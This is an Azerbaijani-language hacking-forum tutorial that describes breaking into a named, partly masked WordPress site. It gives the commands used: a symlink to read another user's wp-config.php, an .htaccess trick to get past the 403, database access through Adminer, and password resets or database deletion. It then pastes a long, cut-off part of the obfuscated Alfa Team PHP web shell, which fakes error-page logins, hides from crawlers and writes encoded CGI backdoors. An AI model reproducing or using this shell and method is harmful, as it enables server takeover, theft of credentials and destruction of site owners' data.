Hədəf Sayta Hücum necə edilir? Website Attack Hacking Tutorial

ramil

ᕦ(►__◄)ᕤ
Ramil
İsmarıclar
150
Reaksiya xalı
171
Qoşuldu
22 Avq 2022
  21 aylıq istifadəçi
Məkan
Azerbaijan
  Önə çıxan mövzu
 • #1
https://www.reddit.com/r/r4m1l/comments/18qk60m

Salam Difai Team İstifadəçiləri

Bügün sizlərə Hədəf Sayta Hücum necə edilir onu göstərəcəm

hədəf sayt - m*esi.ru

sayt WordPress'dir

İçindən bu saytın açığını tapdım və girdim indi isə Hədəf Sayta hücüm edək

İndi isə Başlıyaq

normal ln -s yöntəmini yoxluyacam

WordPress config yolu /wp-config.php


m*esi.ru = meesir75

bu server istifadəçi adları UserRəqəm olaraq qurulub

Alfa Shell ilə istifadəçi adını tapaq

ln -s /var/www/meesir75/public_html/wp-config.php saaa.txt


normal olaraq acilmir 403 verdi indi isə bypass edek .htaccess yolu ile))

.htaccess
Options All
ReadmeName saaa.txtburdakı saaa.txt configini çəkdiyimiz faylın adıdır

indi isə baxaq))

yup çəkdik indi isə Adminer ilə mysql bazaya bağlanaq

indi isə wordpress şifrəsini dəyişək
wp_users

bəzən belədə olur istifadəçini şifrəsini dəyişir amma şifrə yalnış deyir
yəni ya user yaradırıq yada ki, belə DataBase silirik))

yup girdik

ALFA SHELL (LOGSUZ)

PHP:
<?php
/*
  Author:   Solevisible/Alfa-Team
  Telegram:   https://telegram.me/solevisible
  YouTube:   https://youtube.com/solevisible
  Gmail:    [email protected]
  Date:    Monday, September 14, 2020
*/
$GLOBALS['oZgNypoPRU'] = array(
  'username' => 'alfa',
  'password' => 'a6f452ec3293d7fb72c5b677257b20ec',//md5(ehsan)
  'safe_mode' => '0',
  'login_page' => '403',
  'show_icons' => '1',
  'post_encryption' => false,
  'cgi_api' => true,
);

$CWppUDJxuf = 'fu' . 'n' . 'ct' . 'ion_' . 'e' . 'xist' . 's';
$aztJtafUXm = 'cha' . 'r' . 'C' . 'o' . 'd' . 'e' . 'A' . 't' . '';
$OVpGNqqFZs = 'e' . 'v' . 'al';
$psDEwGhsxg = 'gz' . 'inf' . 'late';

if (!$CWppUDJxuf('b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . ''))
{
  function vcnvSCZgBz($data)
  {
    if (empty($data)) return;
    $b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
    $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
    $ac = 0;
    $enc = '';
    $tmp_arr = array();
    if (!$data)
    {
      return $data;
    }
    do
    {
      $o1 = $aztJtafUXm($data, $i++);
      $o2 = $aztJtafUXm($data, $i++);
      $o3 = $aztJtafUXm($data, $i++);
      $bits = $o1 << 16 | $o2 << 8 | $o3;
      $h1 = $bits >> 18 & 0x3f;
      $h2 = $bits >> 12 & 0x3f;
      $h3 = $bits >> 6 & 0x3f;
      $h4 = $bits & 0x3f;
      $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);
    }
    while ($i < strlen($data));
    $enc = implode($tmp_arr, '');
    $r = (strlen($data) % 3);
    return ($r ? substr($enc, 0, ($r - 3)) : $enc) . substr('===', ($r || 3));
  }
  function charCodeAt($data, $char)
  {
    return ord(substr($data, $char, 1));
  }
  function charAt($data, $char)
  {
    return substr($data, $char, 1);
  }
}
else
{
  function vcnvSCZgBz($s)
  {
    $b = 'b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . '';
    return $b($s);
  }
}
if (!$CWppUDJxuf('b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . ''))
{
  function zRtSHsbTzV($input)
  {
    if (empty($input)) return;
    $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    $chr1 = $chr2 = $chr3 = "";
    $enc1 = $enc2 = $enc3 = $enc4 = "";
    $i = 0;
    $output = "";
    $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
    do
    {
      $enc1 = strpos($keyStr, substr($input, $i++, 1));
      $enc2 = strpos($keyStr, substr($input, $i++, 1));
      $enc3 = strpos($keyStr, substr($input, $i++, 1));
      $enc4 = strpos($keyStr, substr($input, $i++, 1));
      $chr1 = ($enc1 << 2) | ($enc2 >> 4);
      $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
      $chr3 = (($enc3 & 3) << 6) | $enc4;
      $output = $output . chr((int)$chr1);
      if ($enc3 != 64)
      {
        $output = $output . chr((int)$chr2);
      }
      if ($enc4 != 64)
      {
        $output = $output . chr((int)$chr3);
      }
      $chr1 = $chr2 = $chr3 = "";
      $enc1 = $enc2 = $enc3 = $enc4 = "";
    }
    while ($i < strlen($input));
    return $output;
  }
}
else
{
  function zRtSHsbTzV($s)
  {
    $b = 'b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . '';
    return $b($s);
  }
}

function __ZW5jb2Rlcg($s)
{
  return vcnvSCZgBz($s);
}
function __ZGVjb2Rlcg($s)
{
  return zRtSHsbTzV($s);
}

$GLOBALS['DB_NAME'] = $GLOBALS['oZgNypoPRU'];

foreach ($GLOBALS['DB_NAME'] as $key => $value)
{
  $prefix = substr($key, 0, 2);
  if ($prefix == "us")
  {
    $GLOBALS['DB_NAME']["user"] = $value;
    $GLOBALS['DB_NAME']["user_rand"] = $key;
  }
  elseif ($prefix == "pa")
  {
    $GLOBALS['DB_NAME']["pass"] = $value;
    $GLOBALS['DB_NAME']["pass_rand"] = $key;
  }
  elseif ($prefix == "sa")
  {
    $GLOBALS['DB_NAME']["safemode"] = $value;
    $GLOBALS['DB_NAME']["safemode_rand"] = $key;
  }
  elseif ($prefix == "lo")
  {
    $GLOBALS['DB_NAME']["login_page"] = $value;
    $GLOBALS['DB_NAME']["login_page_rand"] = $key;
  }
  elseif ($prefix == "sh")
  {
    $GLOBALS['DB_NAME']["show_icons"] = $value;
    $GLOBALS['DB_NAME']["show_icons_rand"] = $key;
  }
  elseif ($prefix == "po")
  {
    $GLOBALS['DB_NAME']["post_encryption"] = $value;
    $GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
  }
  elseif ($prefix == "cg")
  {
    $GLOBALS['DB_NAME']["cgi_api"] = $value;
    $GLOBALS['DB_NAME']["cgi_api_rand"] = $key;
  }
}

unset($GLOBALS['oZgNypoPRU']);

if (!isset($_SERVER["HTTP_HOST"])) exit();

if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
define("__ALFA_VERSION__", "4.1");
define("__ALFA_UPDATE__", "2");
define("__ALFA_CODE_NAME__", "Tesla");
define("__ALFA_DATA_FOLDER__", "ALFA_DATA");
define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__?_AlfaSecretKey():'');
$GLOBALS['__ALFA_COLOR__'] = array(
    "shell_border" => array(
      "key_color" => "#0E304A",
      "multi_selector" => array(
        ".header" => "border: 7px solid {color}",
        "#meunlist" => "border-color: {color}",
        "#hidden_sh" => "background-color: {color}",
        ".ajaxarea" => "border: 1px solid {color}",
        ".foot" => "border-color: {color}",
      )
    ),
    "header_vars" => "#27979B",
    "header_values" => "#67ABDF",
    "header_on" => "#00FF00",
    "header_off" => "#ff0000",
    "header_none" => "#00FF00",
    "home_shell" => "#ff0000",
    "home_shell:hover" => array(
      "key_color" => "#FFFFFF",
      "multi_selector" => array(
        ".home_shell:hover" => "color: {color};",
      )
    ),
    "back_shell" => "#efbe73",
    "back_shell:hover" => array(
      "key_color" => "#FFFFFF",
      "multi_selector" => array(
        ".back_shell:hover" => "color: {color};",
      )
    ),
    "header_pwd" => "#00FF00",
    "header_pwd:hover" => array(
      "key_color" => "#FFFFFF",
      "multi_selector" => array(
        ".header_pwd:hover" => "color: {color};",
      )
    ),
    "header_drive" => "#00FF00",
    "header_drive:hover" => array(
      "key_color" => "#FFFFFF",
      "multi_selector" => array(
        ".header_drive:hover" => "color: {color};",
      )
    ),
    "header_show_all" => "#00FF00",
    "disable_functions" => "#ff0000",
    "footer_text" => "#27979B",
    "menu_options" => "#27979B",
    "menu_options:hover" => array(
      "key_color" => "#646464",
      "multi_selector" => array(
        ".menu_options:hover" => "background-color: {color};font-weight: unset;",
      )
    ),
    "options_list" => array(
      "key_color" => "#00FF00",
      "multi_selector" => array(
        ".content_options_holder .header center a" => "color: {color};",
      )
    ),
    "options_list:hover" => array(
      "key_color" => "#FFFFFF",
      "multi_selector" => array(
        ".content_options_holder .header center a:hover" => "color: {color};",
      )
    ),
    "options_list_header" => array(
      "key_color" => "#59cc33",
      "multi_selector" => array(
        ".txtfont_header" => "color: {color};",
      )
    ),
    "options_list_text" => array(
      "key_color" => "#FFFFFF",
      "multi_selector" => array(
        ".txtfont,.tbltxt" => "color: {color};",
      )
    ),
    "Alfa+" => array(
      "key_color" => "#06ff0f",
      "multi_selector" => array(
        ".alfa_plus" => "color: {color};font-weight: unset;",
      )
    ),
    "hidden_shell_text" => array(
      "key_color" => "#00FF00",
      "multi_selector" => array(
        "#hidden_sh a" => "color: {color};",
      )
    ),
    "hidden_shell_version" => "#ff0000",
    "shell_name" => "#FF0000",
    "main_row:hover" => array(
      "key_color" => "#646464",
      "multi_selector" => array(
        ".main tr:hover" => "background-color: {color};",
      )
    ),
    "main_header" => array(
      "key_color" => "#FFFFFF",
      "multi_selector" => array(
        ".main th" => "color: {color};",
      )
    ),
    "main_name" => array(
      "key_color" => "#FFFFFF",
      "multi_selector" => array(
        ".main .main_name" => "color: {color};font-weight: unset;",
      )
    ),
    "main_size" => "#67ABDF",
    "main_modify" => "#67ABDF",
    "main_owner_group" => "#67ABDF",
    "main_green_perm" => "#25ff00",
    "main_red_perm" => "#FF0000",
    "main_white_perm" => "#FFFFFF",
    "beetween_perms" => "#FFFFFF",
    "main_actions" => array(
      "key_color" => "#FFFFFF",
      "multi_selector" => array(
        ".main .actions" => "color: {color};",
      )
    ),
    "menu_options:hover" => array(
      "key_color" => "#646464",
      "multi_selector" => array(
        ".menu_options:hover" => "background-color: {color};font-weight: unset;",
      )
    ),
    "minimize_editor_background" => array(
      "key_color" => "#0e304a",
      "multi_selector" => array(
        ".minimized-wrapper" => "background-color: {color};",
      )
    ),
    "minimize_editor_text" => array(
      "key_color" => "#f5deb3",
      "multi_selector" => array(
        ".minimized-text" => "color: {color};",
      )
    ),
    "editor_border" => array(
      "key_color" => "#0e304a",
      "multi_selector" => array(
        ".editor-explorer,.editor-modal" => "border: 2px solid {color};",
      )
    ),
    "editor_background" => array(
      "key_color" => "rgba(0, 1, 23, 0.94)",
      "multi_selector" => array(
        ".editor-explorer,.editor-modal" => "background-color: {color};",
      )
    ),
    "editor_header_background" => array(
      "key_color" => "rgba(21, 66, 88, 0.93)",
      "multi_selector" => array(
        ".editor-header" => "background-color: {color};",
      )
    ),
    "editor_header_text" => array(
      "key_color" => "#00ff7f",
      "multi_selector" => array(
        ".editor-path" => "color: {color};",
      )
    ),
    "editor_header_button" => array(
      "key_color" => "#1d5673",
      "multi_selector" => array(
        ".close-button, .editor-minimize" => "background-color: {color};",
      )
    ),
    "editor_actions" => array(
      "key_color" => "#FFFFFF",
      "multi_selector" => array(
        ".editor_actions" => "color: {color};",
      )
    ),
    "editor_file_info_vars" => array(
      "key_color" => "#FFFFFF",
      "multi_selector" => array(
        ".editor_file_info_vars" => "color: {color};",
      )
    ),
    "editor_file_info_values" => array(
      "key_color" => "#67ABDF",
      "multi_selector" => array(
        ".filestools" => "color: {color};",
      )
    ),
    "editor_history_header" => array(
      "key_color" => "#14ff07",
      "multi_selector" => array(
        ".hheader-text,.history-clear" => "color: {color};",
      )
    ),
    "editor_history_list" => array(
      "key_color" => "#03b3a3",
      "multi_selector" => array(
        ".editor-file-name" => "color: {color};",
      )
    ),
    "editor_history_selected_file" => array(
      "key_color" => "rgba(49, 55, 93, 0.77)",
      "multi_selector" => array(
        ".is_active" => "background-color: {color};",
      )
    ),
    "editor_history_file:hover" => array(
      "key_color" => "#646464",
      "multi_selector" => array(
        ".file-holder > .history:hover" => "background-color: {color};",
      )
    ),
    "input_box_border" => array(
      "key_color" => "#0E304A",
      "multi_selector" => array(
        "input[type=text],textarea" => "border: 1px solid {color}",
      )
    ),
    "input_box_text" => array(
      "key_color" => "#999999",
      "multi_selector" => array(
        "input[type=text],textarea" => "color: {color};",
      )
    ),
    "input_box:hover" => array(
      "key_color" => "#27979B",
      "multi_selector" => array(
        "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
      )
    ),
    "select_box_border" => array(
      "key_color" => "#0E304A",
      "multi_selector" => array(
        "select" => "border: 1px solid {color}",
      )
    ),
    "select_box_text" => array(
      "key_color" => "#FFFFEE",
      "multi_selector" => array(
        "select" => "color: {color};",
      )
    ),
    "select_box:hover" => array(
      "key_color" => "#27979B",
      "multi_selector" => array(
        "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
      )
    ),
    "button_border" => array(
      "key_color" => "#27979B",
      "multi_selector" => array(
        "input[type=submit],.button,#addup" => "border: 1px solid {color};",
      )
    ),
    "button:hover" => array(
      "key_color" => "#27979B",
      "multi_selector" => array(
        "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
        ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
      )
    ),
    "outputs_text" => array(
      "key_color" => "#67ABDF",
      "multi_selector" => array(
        ".ml1" => "color: {color};",
      )
    ),
    "outputs_border" => array(
      "key_color" => "#0E304A",
      "multi_selector" => array(
        ".ml1" => "border: 1px solid {color};",
      )
    ),
    "uploader_border" => array(
      "key_color" => "#0E304A",
      "multi_selector" => array(
        ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
      )
    ),
    "uploader_background" => array(
      "key_color" => "#0E304A",
      "multi_selector" => array(
        ".inputfile strong" => "background-color: {color};",
      )
    ),
    "uploader_text_right" => array(
      "key_color" => "#FFFFFF",
      "multi_selector" => array(
        ".inputfile strong" => "color: {color};",
      )
    ),
    "uploader_text_left" => array(
      "key_color" => "#25ff00",
      "multi_selector" => array(
        ".inputfile span" => "color: {color};",
      )
    ),
    "uploader:hover" => array(
      "key_color" => "#27979B",
      "multi_selector" => array(
        ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
      )
    ),
    "uploader_progress_bar" => array(
      "key_color" => "#00ff00",
      "multi_selector" => array(
        ".up_bar" => "background-color: {color};",
      )
    ),
    "mysql_tables" => "#00FF00",
    "mysql_table_count" => "#67ABDF",
    "copyright" => "#dfff00",
    "scrollbar" => array(
      "key_color" => "#1e82b5",
      "multi_selector" => array(
        "*::-webkit-scrollbar-thumb" => "background-color: {color};",
      )
    ),
    "scrollbar_background" => array(
      "key_color" => "#000115",
      "multi_selector" => array(
        "*::-webkit-scrollbar-track" => "background-color: {color};",
      )
    ),
);
$GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
$config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
//@session_start();
@session_write_close();
@ignore_user_abort(true);
@set_time_limit(0);
@ini_set('memory_limit', '-1');
@ini_set("upload_max_filesize", "9999m");
if($config['AlfaProtectShell']){
$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
$Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
if($config['AlfaLoginPage'] == 'gui'){
if(@$_COOKIE["AlfaUser"] != $config['AlfaUser'] && $_COOKIE["AlfaPass"] != md5($config['AlfaPass'])){
if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
@header('location: '.$_SERVER["PHP_SELF"]);
}
echo '
<style>
body{background: black;}
#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
#loginbox td { border-radius:5px; font-size:11px; }
</style>
<title>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~</title><center>
<center><img style="border-radius:100px;" width="500" height="250" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></center>
<div id=loginbox><p><font face="verdana,arial" size=-1>
<center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
<tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~</b></font></th></tr>
<tr><td bgcolor="black" style="padding:5">
<form method="post">
<input type="hidden" name="action" value="login">
<input type="hidden" name="hide" value="">
<center><table>
<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
<tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
</div><br /></center>';
exit;
}
}elseif($config['AlfaLoginPage']=='500'){
if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
@header('location: '.$_SERVER["PHP_SELF"]);
}
echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;
exit;
}
}elseif($config['AlfaLoginPage']=='403'){
if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
@header('location: '.$_SERVER["PHP_SELF"]);
}
echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
exit;
}
}elseif($config['AlfaLoginPage']=='404'){
if(@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
__alfa_set_cookie("AlfaUser", $config['AlfaUser']);
__alfa_set_cookie("AlfaPass", @md5($config['AlfaPass']));
@header('location: '.$_SERVER["PHP_SELF"]);
}
echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
exit;
}
}
}
function decrypt_post($str){
  if(__ALFA_POST_ENCRYPTION__){
    $pwd = __ALFA_SECRET_KEY__;
    $pwd   = __ZW5jb2Rlcg($pwd);
    $str   = __ZGVjb2Rlcg($str);
    $enc_chr = "";
    $enc_str = "";
    $i    = 0;
    while ($i < strlen($str)) {
      for ($j = 0; $j < strlen($pwd); $j++) {
        $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
        $enc_str .= $enc_chr;
        $i++;
        if ($i >= strlen($str))
          break;
      }
    }
    return __ZGVjb2Rlcg($enc_str);
  }else{
    return __ZGVjb2Rlcg($str);
  }
}

function _AlfaSecretKey(){
  $secret = @$_COOKIE["AlfaSecretKey"];
  if(!isset($_COOKIE["AlfaSecretKey"])){
    $secret = uniqid(mt_rand(), true);
    __alfa_set_cookie("AlfaSecretKey", $secret);
  }
  return $secret;
}
function alfa_getColor($target){
  if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
    return $GLOBALS["DB_NAME"]["color"][$target];
  }else{
    $target = $GLOBALS["__ALFA_COLOR__"][$target];
    if(is_array($target)){
      return $target["key_color"];
    }else{
      return $target;
    }
  }
}
function alfaCssLoadColors(){
  $css = "";
  foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
    if(!is_array($value)){
      $value = alfa_getColor($key);
      $css .= ".{$key}{color: {$value};}";
    }else{
      if(isset($value["multi_selector"])){
        foreach($value["multi_selector"] as $k => $v){
          $color = alfa_getColor($key);
          $code = str_replace("{color}", $color, $v);
          $css .= $k."{".$code."}";
        }
      }
    }
  }
  return $css;
}
if(isset($_POST['ajax'])){
function AlfaNum(){
$args = func_get_args();
$alfax = array();
$find = array();
for($i=1;$i<=10;$i++){
$alfax[] = $i;
}
foreach($args as $arg){
$find[] = $arg;
}
echo '<script>';
foreach($alfax as $alfa){
if(in_array($alfa,$find))
continue;
echo 'alfa'.$alfa."_=";
}
echo '""</script>';
}}
function _alfa_cgicmd($cmd,$lang="perl",$set_cookie=false){
  if(!$GLOBALS["DB_NAME"]["cgi_api"]){
    return "";
  }
  if(isset($_COOKIE["alfacgiapi_mode"])){
    return "";
  }
  $cmd_pure = $cmd;
  $is_curl = function_exists('curl_version');
  $is_socket = function_exists('fsockopen');
  if($is_curl||$is_socket){
    $recreate = false;
    if(isset($_COOKIE["alfacgiapi"])){
      if(!@file_exists("alfacgiapi/".$_COOKIE["alfacgiapi"].".alfa")){
        $recreate = true;
        $lang = $_COOKIE["alfacgiapi"];
      }
    }
    if(!isset($_COOKIE["alfacgiapi"])||$recreate){
      @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
      $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
      $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
      $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
      $aspx = "jZNda9swFIavk18hNAoOAXdsozdLyrrUKYaRlriNN0IuFPvEFbUl70jOB2P97T1SPBo8ynZlS+d53/Ph49HZF3YnCmDfhCoaehnzyTvOIiXWJSwk7BIrLF1uRGmAs7PL/ogUcVVrtGwmKjC1yCieHIyFKkxhHT7E7jHRyqIuzb8111IUShsrs/+A41vPENTvGYtSFSyrcjZmc/jZgLHhVGO15HTHV59fkUfInv6G3K3H5CZokTHj6cfZdn2z+CC+z+of1b7cVNOdWLwf88Gvfq+3PlhYrlgurCDDtipqdgtIvqirr8LAxafEJw6ojgH59441tvQ97G14lUziOFKZzok7nsIbsK3O2ZOQlHeoMzCG1aRXsGPtOfC2dUifB22sNjqcINCXmulUqlzviLbYQBeayhLcUCnsZhTCHniXucKiqUBZ46DzjHE2dDPuYg8Gkkcoy2gPWWOdo9+RLjaHXCJk1JhQucD8trF1Y98orwtHiBrfYFONTzSqay/QePDVnjYTHAfYroD+k9dHT0qhpCK/15HKgwF1+hr2yU+jzntO+6iVgTBFaSHgS6NL2Eoj6Xd5FrVcjWqESz48phvy0bk/O+3vPi3uCw==";
      if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
      if($lang == "aspx"){
        alfaWriteTocgiapi("aspx.aspx",$aspx);
      }else{
        alfaWriteTocgiapi($lang.".alfa",$source);
      }
      alfacgihtaccess('cgi', "alfacgiapi/");
    }else{
      $lang = $_COOKIE["alfacgiapi"];
    }
    $cgi_ext = ".alfa";
    if($lang=="aspx"){
      $cgi_ext = ".aspx";
    }
    $cgi_url = __ALFA_DATA_FOLDER__."/alfacgiapi/".$lang.$cgi_ext;
    $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
    if($is_curl){
      $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/".$cgi_url;
      $post = new AlfaCURL();
      $data = $post->Send($address, "post", $cmd);
    }elseif($is_socket){
      $server = $_SERVER["SERVER_NAME"];
      $uri = dirname($_SERVER["REQUEST_URI"])."/".$cgi_url;
      $data = _alfa_fsockopen($server,$uri,$cmd);
    }
    $out = "";
    if(strpos($data, "[solevisible~api]") !== false && strpos($data, '[solevisible~api]<pre>"+output+"</pre>') === false){
      if($set_cookie){
        __alfa_set_cookie("alfacgiapi", $lang);
      }
      if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
        $out = $res[1];
      }
    }elseif($lang=="perl"){
      return _alfa_cgicmd($cmd_pure,"py",$set_cookie);
    }elseif($lang=="py"){
      return _alfa_cgicmd($cmd_pure,"bash",$set_cookie);
    }elseif($lang=="bash" && $GLOBALS['sys']=="win"){
      return _alfa_cgicmd($cmd_pure,"aspx",$set_cookie);
    }else{
      if($set_cookie){
        __alfa_set_cookie("alfacgiapi_mode", "off");
      }
    }
    return trim($out);
  }else{
    return "";
  }
}
function alfaGetCwd(){
  if(function_exists("getcwd")){
    return @getcwd();
  }else{
    return dirname($_SERVER["SCRIPT_FILENAME"]);
  }
}
